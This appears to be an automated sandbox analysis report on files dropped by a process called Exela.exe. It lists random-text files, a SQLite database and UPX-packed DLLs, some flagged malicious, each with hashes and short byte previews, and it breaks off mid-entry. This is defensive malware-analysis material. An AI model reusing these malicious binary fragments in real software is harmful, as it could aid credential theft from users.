                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701796197804446
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                  MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                  SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                  SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                  SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.696835919052288
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                  MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                  SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                  SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                  SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698711683401115
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                                                                  MD5:47643CE7571E0C995094D7CE5F2005D7
                                                                                                  SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                                                                  SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                                                                  SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698393795110914
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
                                                                                                  MD5:7C5655873C22D2522B13B34841F82038
                                                                                                  SHA1:ED733AE5B3E813B97D69E7283AEB8085EFC62B78
                                                                                                  SHA-256:9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
                                                                                                  SHA-512:A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.696835919052288
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                  MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                  SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                  SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                  SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701111373123985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:wSplMoG/A1oXDoMwazZW6QAFWyGjkGKnEuDxOaV9YnF7U:walZG/A12L8MFYr8EuxTK9U
                                                                                                  MD5:CA5A3E2A0C2DDF92EABE165672425976
                                                                                                  SHA1:1933AC1A510945A766039E7E61D7DA4156E0F074
                                                                                                  SHA-256:4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
                                                                                                  SHA-512:64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.702862417860716
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:JCmIDeBF63lGj/+QvH8n8JCl7odrVgKqBP68iz:4QQQvHFrTqBPXiz
                                                                                                  MD5:CC0686FCDF6617729D1EDF30F49501F1
                                                                                                  SHA1:02D629848E3D467D8143B057F003E0D7448126CD
                                                                                                  SHA-256:31E15305BC0579F03C51A1D6534B332F32C73ABC6D1B68BA0BDA6FCF97F593C9
                                                                                                  SHA-512:8BD18EB486BA6D2799329D9A8EFB3F52C3D109F5CB070290418DDE4B58756CD023857E4CAE62323C530FA0D3A60372C97D9744C1911A688D3592EABD14005F25
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701796197804446
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                  MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                  SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                  SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                  SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                  Category:dropped
                                                                                                  Size (bytes):196608
                                                                                                  Entropy (8bit):1.1215420383712111
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                  MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                  SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                  SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                  SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):109392
                                                                                                  Entropy (8bit):6.643764685776923
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:DcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/Auecbq8qZU34zW/K0zD:DV3iC0h9q4v6XjKAuecbq8qGISb/
                                                                                                  MD5:870FEA4E961E2FBD00110D3783E529BE
                                                                                                  SHA1:A948E65C6F73D7DA4FFDE4E8533C098A00CC7311
                                                                                                  SHA-256:76FDB83FDE238226B5BEBAF3392EE562E2CB7CA8D3EF75983BF5F9D6C7119644
                                                                                                  SHA-512:0B636A3CDEFA343EB4CB228B391BB657B5B4C20DF62889CD1BE44C7BEE94FFAD6EC82DC4DB79949EDEF576BFF57867E0D084E0A597BF7BF5C8E4ED1268477E88
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: 9g9LZNE4bH.exe, Detection: malicious
                                                                                                  • Filename: Holoscope-V1.3.5.exe, Detection: malicious
                                                                                                  • Filename: dsoft.exe, Detection: malicious
                                                                                                  • Filename: winws1.exe, Detection: malicious
                                                                                                  • Filename: discord.exe, Detection: malicious
                                                                                                  • Filename: file.exe, Detection: malicious
                                                                                                  • Filename: cmd.exe, Detection: malicious
                                                                                                  • Filename: NEVER OPEN!.exe, Detection: malicious
                                                                                                  • Filename: HeilHitler.exe, Detection: malicious
                                                                                                  • Filename: meN9qeS2DE.exe, Detection: malicious
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d.....y..........." ...".....`.......................................................5....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):35712
                                                                                                  Entropy (8bit):7.645244129807927
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:U2sbZA5n1we/lPgOb1koYpu53VnJ2gl+NfUpv+I75n2EYiSyvPRPxWED:U2RhZtXxkoYiTTENE+I75n2E7SynRPx
                                                                                                  MD5:7D4F9A2B793E021F7E37B8448751ED4E
                                                                                                  SHA1:0EA07B5024501AAD5008655CFEAE6D96B5DA957A
                                                                                                  SHA-256:2293C1B6B0B901832A57A1C4DCB1265C9E92D21177195712C30632A7B63227D4
                                                                                                  SHA-512:AF75452279C308C61C3E222A031A8201E47E8FE44C4E92CB7DAB03D56C7E7E3E2A2C589F650C50E0B29E2DF175D6F2FF50C8E5E589D17A124BF0A2E0D7886C26
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........TF.q.F.q.F.q.O...D.q...p.D.q...t.J.q...u.N.q...r.E.q...p.E.q...p.D.q.F.p...q...|.G.q...q.G.q....G.q...s.G.q.RichF.q.................PE..d...$..c.........." ...".`.......... #.......................................P............`..........................................J..P....I..P....@......................DK..$................................... /..@...........................................UPX0....................................UPX1.....`.......R..................@....rsrc........@.......V..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):47992
                                                                                                  Entropy (8bit):7.809914406923306
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:NiQxyc/3D2HGItfsKbsonbgiHUoYbcp87I7tVbeiYiSyv5PxWEDX:N5xdEsKbtnbgqUoYb7I7tVbh7SyxPx9
                                                                                                  MD5:6250A28B9D0BFEFC1254BD78ECE7AE9F
                                                                                                  SHA1:4B07C8E18D23C8AE9D92D7B8D39AE20BC447AECD
                                                                                                  SHA-256:7D43F7105AA4F856239235C67F61044493EE6F95DDF04533189BF5EA98073F0B
                                                                                                  SHA-512:6D0AA5C3F8F5B268B94341DFDD5AFBE48F91F9AAC143BF59F7F5E8BA6F54205B85EC527C53498ED8860FDFF6A8D08E48EC4E1652EEAB2D3C89AAAF3A14FCAAA7
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................a.........................................t.........................................Rich....................PE..d...2..c.........." ..."............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):72704
                                                                                                  Entropy (8bit):7.915281953043909
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:g+638lwdrNzfq3MgGu9KgGWzt1iaqP+E4WnpH118g:gz8u/zf4MgGuZGWzt1ia7E4WpH11
                                                                                                  MD5:7727212E7BDBF63B1A39FB7FAAD24265
                                                                                                  SHA1:A8FDEC19D6690081B2BF55247E8E17657A68AC97
                                                                                                  SHA-256:B0116303E1E903D6EB02A69D05879F38AF1640813F4B110CB733FFFF6E4E985C
                                                                                                  SHA-512:2B1A27642118DD228791D0D8BA307AA39AB2D9C7D3799CFF9F3C0744FE270EEAEFE5545A4FDA6E74E86FEE747E45BF5F6C9AC799950C2B483A16EB3CE85D816A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#...p...p...p...p...p.y.q...p.y{p...p.y.q...p.y.q...p.y.q...p.q...pi..q...p...pX..p.x.q...p...p...p.x.q...p.xyp...p.x.q...pRich...p................PE..d......f.........." ...). .......0..@C...@...................................p............`..........................................c..l....`.......`......................hd..$...................................@O..@...........................................UPX0.....0..............................UPX1..... ...@......................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):58232
                                                                                                  Entropy (8bit):7.819692209624967
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:3UP3/jolpinLX2rRaWMzhBuW9I7QP7h7SykPxiM:A3/jolwXuRaW6wUI7QP7h2xB
                                                                                                  MD5:4B90108FABDD64577A84313C765A2946
                                                                                                  SHA1:245F4628683A3E18BB6F0D1C88AA26FB959ED258
                                                                                                  SHA-256:E1B634628839A45AB08913463E07B6B6B7FD502396D768F43B21DA2875B506A1
                                                                                                  SHA-512:91FA069D7CF61C57FAAD6355F6FD46D702576C4342460DADCEDFDCBC07CD9D84486734F0561FA5E1E01668B384C3C07DD779B332F77D0BB6FBDBB8C0CB5091BC
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......NC..."..."..."...Z..."..E^..."..E^..."..E^..."..E^..."...^..."...P..."...P..."...K..."..."..."...^..."...^..."...^x.."...^..."..Rich."..........................PE..d.../..c.........." ...".........p..P........................................@............`.........................................H<.......9.......0..........,............<......................................`%..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):106368
                                                                                                  Entropy (8bit):7.93479712134
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:GgCMV2Mz94bMgxECS8kePpTn8jI75qNp6mx:G1MV2Mz94og2tJePpwpp
                                                                                                  MD5:20985DC78DBD1992382354AF5CA28988
                                                                                                  SHA1:385A3E7A7654E5E4C686399F3A72B235E941E311
